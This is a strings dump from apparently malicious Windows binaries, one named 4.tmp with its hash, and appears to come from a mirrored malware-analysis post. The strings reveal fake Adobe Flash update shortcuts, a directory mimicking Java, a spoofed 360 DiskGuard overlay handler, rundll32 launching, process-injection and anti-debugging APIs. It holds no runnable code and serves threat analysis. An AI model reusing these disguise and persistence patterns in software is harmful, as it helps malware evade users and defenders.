userinit.exe
FunctionWork
%s\updateerror_2tmp.log
%s\updateerror_2.log
\Sun Orcal\Java\Jre
91827-EFAf-AFJALS_13435
ws2_32.dll
%u.%u.%u.%u
infoSize
020~0
1-1:1d1i1
1*2_2w2
484^4
5$5*515=5l5
6i6s6}6
717J7Q7v7
7Y8}8
;3;G;[;o;u;
<%<,<A<K<P<g<n<|<
<!=&=3=G=L=V=[=`=j=o=t=~=
>!>&>+>5>:>?>I>N>S>]>b>g>q>v>{>
?+?0?5???D?I?S?X?]?g?l?q?{?
0#0(02070<0F0K0P0Z0_0d0q0v0{0
1(1F1K1
203T3w3
494a4g4m4s4
4,5<5z5
6 6)6P6
8$8t8
9$9/9X9y9
:.:U:`:
;0;f;
=&=.=c=
=*>9>@>`>g>x>
?#?E?N?f?{?
0F0P0U0}0
0>1w1
1?2h2{2
3(3/3/464<4H4Z4r4w4
52575r5
6"6W6\6
707:7\7c7x7
8G8^8v8
9*9C9c9h9
:$:X:s:
:(;0;O;V;e;};
<$<0<7<P<
=_=x=
>5>r>
>+?0?e?j?
<0C0u0
1.1<1N1t1
1$272K2R2
3Q3X3]3c3q3w3|3
3%4*4d4p4
5<5L5S5
6'6,6:6^6n6
6#7*7;7
8]8t8
=[=z=
0\0c0
6"70787>7I7V7^7l7q7v7{7
7T8p8
@1P1`1p1

Unicode Strings:
---------------------------------------------------------------------------
jjjj
aKernelBase.dll

================================================================
File: 4.tmp
MD5:  6d2c12085f0018daeb9c1a53e53fd4d1
Size: 57344

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich?
.text
`.rdata
@.data
GJMTWZ48
This progr
m cannot b
 run in DO
 mode.
xRich&
.twxt
`.rdata
.data
L$$Pj
L$8Pj
:T$
D$8g
Z|$!
L$$Q
D$ RP
T$ QR
_^]2
Phs|
VhHp
_^]2
j&PR
PRh`p
j#Pj
Phiw
T$(C
VW"`p
VWh|w
VWhpw
_^][u
\SVW
S~W3
t$S]
QSh?
SSSVh
uXVh
t ;=
ySVW3
D$bQP
Ph,x
VWPh?
T$cQ
j#Pj
T$xj
D$8h
D$pj
T$tR
T$@Q
T$tRhpy
?u~hdy
_^][
SUVW
L$xj#QSr
D$tS
T$t/
L$tSQ
Qh z
T$tRW
R40z
uj86$
L$DP
T$th
t^Vh
_^][
j#Rj
L$,h
D$@h
uA_2
WWWV
WPUSV
j#Pj
UD~D$8h
L$@h
ND$8
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
_^[9
Rj@SV
Qj@SVe
#PPV
~D/
t$$5
D$l|
_^]3
e^][
tISU
_^]3
_^]|
ti_^3
^3|[Y
_]^[Y
vVS3
D$ P
D$fP
L$9f
H8IH
|$0h(|
D$8QR
D$8QRP
D$8QRP
iSh8
|$8B
uuSSh8
u?h<
NWVS
u&WVS
_^[]
lstrcpyA
CancelI`
GetFilaAttributes
lstrca
lstrc
lstr
ualProtect
DeleteF
Free
ibrary
oseHandle
WaitForSi
gleObject
Sleep
tSystemDir
ctoryA
G:tModuleFil1NameA
F ndClose
metFileAttrZbutesA
nindNextFilxA
FindFi`stFileA
ReadFile
SetFilePo
nter
FileSize
CreateFile
WideCha
ToMultiByt
CopyFil
GetLas
Error
rtualFree
ERNEL32.dl
wsprin
USER32.
RegC
oseKey
R2gQueryValu)ExA
penKeyExA
RegSetVal^eExA
ReGCreateKeyEmA
ADVAPI32$dll
tSpecialFo
derPathA
ELL32.dll
S2_32.dll
??3@YAXP
fwri
fseek
fopen
?2@YAPAXI@
fprint
fread
ysprintf
ept_handle(3
strrc'r
__p__p#mptr
strJtr
renaCe
rand
srand
lime
__CuxFrameHandner
free
malloc
_beginthr
adex
move
MSVCR
.dll
itterm
djust_fdiv
StrStrI
SHLWAPI.
_file
ength
leno
uerverDll.dwl
sGorking
stbynam
nect
2.dll
getho
window
\syswow64
ShE11C0D
Softwar
\Google
11C0DESize
CcocCcrc
cactcecIcn
sctcacnccc
CeoeI2neieteieae eiezeea
otltet3t2t
tdtltlt
CHocUcncicncIctcicaclcivzcec
RcocgcScectcV
aclcucecEc
geOapbecne
deeyxEexxA
Afdfvfaf
fif3f2f.fd
lflf
dgeCflgohs
ekKledyc
chceclclcE
xcecccuctc
Schfe
lcla3e2q.d
clalg
SdHeGfefteSapc?xcdidadldF+odldddedrd
dadtdhdAd
LvovavdvIvMvovnvAv
SPesnsdsMsesksssasgsesA~
FfifnfffWfifnfdfo
wfEfxfAf
trtatntstl
atttetMtet
tstatgtet
Ddidsdpd
dtdcdhdMde
sdsdadgded
Gdedt
Mdedsdsdad
dedAd
oowoWoiono
ooowo
rbebabtbeb?bibnbdbobw?EbxbAb
Rr7rgrirsrtre5rrCrlrarsrOrErxrAr
GeeeteIeneVeueteSetea~teee
LlolqldlClulrlsiolrlAl
ssstsQsusi
tsMsesssss
sgses
efrf3f2f.f
flflf
ousutuTuhu
ueuauduMue
susuaugueu
nctad
ldla.eddla
ZawdQcu
eerrytSdyg
stdeemgIdn
froargmeaa
citodnx
GcectcScyc9ctcecmcDci\rceccctcocFcycAc
TbeKrbmbibnbabjbebPbrbobcqebsbsb
OvevtvCvuvr
rvevnvtvPv
vovcvevsvs
Ivdv
Cdrd
dadtdedPdr
odcdedsdsd
Vdidr
tdudadldFd
dededEdxd
OgpheensPa
cogchejsks
Vaigrcte
aagleAglhl
orcaEcxx
Wgreiatge
Pxrgoecseg+hseMsecmeo)rryg
Cc0henaateegR_edmeoxtgehxahgreesaddB
Gceate@xegresgihonnxEhxeAx
k0e0rxndefl
3a2g.cdale
Etxhi
taPgrhojcr
ascsa
acdcLcicbc
cacrcycWc
Lcocacdc
cicbcrcacr
ycAc
dtdMdodddu
ldedHdadnd
dldedAd
GgegtgPgrg
gcgAgdgdgr<egsgsg
aualataiaB$yataeaTaoamaiadaeaCahNaara
CmomTmymFmimlmetAm
CirieioitieiDiiirjeicitioiri
thThehmhph
hahthhhAh
GqeqtqFq
qlqeqAqtqt
rqiqbquqtq
qsqAq
eytyCyuyry
yeynytyTyh
ryeyaydyIy
Cwrwe
awtwewMwuwtwewxwAw
SbebtbFbib2bebAbtbtbr1ibbbubtbeb;bAb
VdiYrdtdudadldsdldldodcd
VcicrctcicaclcPcrcortceccctc
Raedmdodv
edDdidrded
dtdodrdydA
k0e0rx
deflg3a2g.
dflflf
aebtcMdoad
ualfeaFdia
feaNfaamfe
info
8202u39232B.log
%s\8^02u39232e.
%s\820du39232s.db
%s\8202us9232d.log
%sSize
KernelBaszGetGlobalDuta
Kernel32
%s%s
AutoE
dTasks
ontrol Pan
l\Desktop
Start
Soft
are\Micros
ft\Windows&CurrentVer
ion\Explor
r\User She5l Folders
%s%s%s
FTWARE\ClaKses\CLSID\
\InprocSerTer32
SOFTWVRE\Microsojt\Windows\BurrentVers
on\Explore
\ShellIcon
verlayIden
ifiers\360
DiskGuard
con Overla
rundll
FileBufSiz
%s\Adobe
lash Updat
d { %d}.ln
%s\Ado
e_FlashUpd
te.lnk
ava Sun
%s\Adobe_F*ashUpdate @ %d}.lnk
cunJavaErrrJr.log sI
Adobe_Fla|hUpdate.lno
\rundll
2.exe
%s\error.
%s\S
nJavaErrro
.log
\Jre
\Java
Sun Orcal
dll.log
rd.dll
\*.*
%s\Como
o Updated.
%sABC
comodo.l;g
%s.log
%s\360UdisUGuard.dll
rundll32
"%sAf.log"
\helpbr
\Javame
1827-EFAf-
FJALS_1343
.tmp
\Secu
ityLog.log
\Securi
yLog
sWork
%s\u
erinit.exe
taskhost.e
explo
er.exe
serinit.ex
Functi
nWork
%$\updateerr#r_2tmp.log
%s\updateeDror_2.log
\Sun OrcAl\Java\Jre
91827-EFAf'AFJALS_134
ws2_32.d
%u.%u.%
infoSi
020~0
:1d1i1
1*2_2w2
484^4
5*515=5l5
6i6s6}
17J7Q7v7
7Y8}8
;3;G;[;o;%;
<,<A<K<P<g
n<|<
<!=&=3=G=B=V=[=`=j=o>t=~=
>!>&>
>5>:>?>I>N
S>]>b>g>q>
?+?0@5???D?I?S?,?]?g?l?q?{V
0#0(0207
<0F0K0P0Z0C0d0q0v0{0
1(1F1K1
494a4g4m4
,5<5z5
6 6)
8$8t8
9$9/XX9y9
:.:U:`q
;0;f;
=&=.=c=
=*>9>@>t>g>x>
?E?N?f?{?
P0U0}0
>1w1
1?2h2{
3(3/3/46
<4H4Z4r4w4"4
5257
5g6"6W6\6
707:7\7c7
8^8v8
9*9C9c9h9G9
:$:X:s:
:(,0;O;V;e;};
<$=0<7<P<
=_=x
>5>r>
>+?0
e?j?
<0C0
1.1<1N1t1
1$272K
3Q3X3]3c3qNw3|3
3%4*4d4pS
5<5L5Sd
'6,6:6^6n6
6#7*7;7
8]8t8
=[2z=
0\0c0
70787>7I7V
^7l7q7v7{7D7
7T8p8
@1P1`1p1
SUVW
v:SV
^[_]
UVWS3
_^]3
_^][
D/D*
[zFF
Z.DJ
SUVW
j#Pj
Pj@USV
UQSV
RUSV
_^][
SUVW3
L$(Sj
L$4SS
j#PS
D$$P
T$(h
L$(h
T$$j
_^]3
PQSSh
v&SV
$_[^
hSVW
>"u:F
XPVSS
Sleep
GetFileAttributesA
GetModuleFileNameA
GetCurrentProcess
VirtualProtect
GlobalFree
ReadFile
GlobalAlloc
CloseHandle
GetFileSize
CreateFileA
lstrlenA
DeleteFileA
IsDebuggerPresent
WriteProcessMemory
VirtualProtectEx
ExitProcess
ContinueDebugEvent
WaitForDebugEvent
CreateProcessA
KERNEL32.dll
SendMessageA
FindWindowExA
MessageBoxA
USER32.dll
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
_beginthreadex
??2@YAPAXI@Z
fclose
fwrite
fopen
??3@YAXPAX@Z
sprintf
atoi
fread
_except_handler3
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
GetStartupInfoA
_filelength
_fileno
Bin.exe
TlsMain
0x0056E345
23.d
Warning
ocessA
Creat
32.dll
Process
inate
Term
%s\8202u3923pi.db
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%s\len.txt
%s\start.txt
JMPTZ48b
%s "%s\8202u39232d.log" InF
ll32.exe
rund

Unicode Strings:
---------------------------------------------------------------------------
aKer

nelBas
.dll
@jjj
jjjj



Viewing all 79 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>